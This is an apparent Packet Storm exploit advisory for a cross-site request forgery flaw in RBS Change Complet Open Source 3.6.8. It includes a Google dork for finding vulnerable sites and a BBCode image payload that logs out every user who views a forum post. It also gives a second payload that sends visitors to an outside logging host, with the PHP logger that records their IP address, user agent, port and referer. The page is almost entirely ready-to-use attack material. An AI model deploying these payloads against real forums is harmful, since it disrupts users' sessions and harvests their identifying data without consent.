RBS Change Complet Open Source suffers from a cross site request forgery vulnerability.
d43040fd7032e2ecb3e882ad775ad21c302409504829f119ffc7016979f2dfff# Exploit Title: RBS Change Complet Open Source CSRF
# Google Dork: intext:"une réalisation rbs"
# Date: 10/01/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://www.rbschange.fr/
# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html
# Version: 3.6.8
# Tested on: Linux
HOW TO
======
Just add [img="http://CSRF"][/img] on forum signature or forum posts.
TEST
====
Based on demo.rbschange.fr:
---------------------------
[img="http://server/fr/deconnexion/"][/img]
Will disconnect all users who load the image.
Other example:
--------------
[img="http://www.example.com/log.php"][/img]
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip - $rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND);
?>
To get users ip, user agent, ...
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed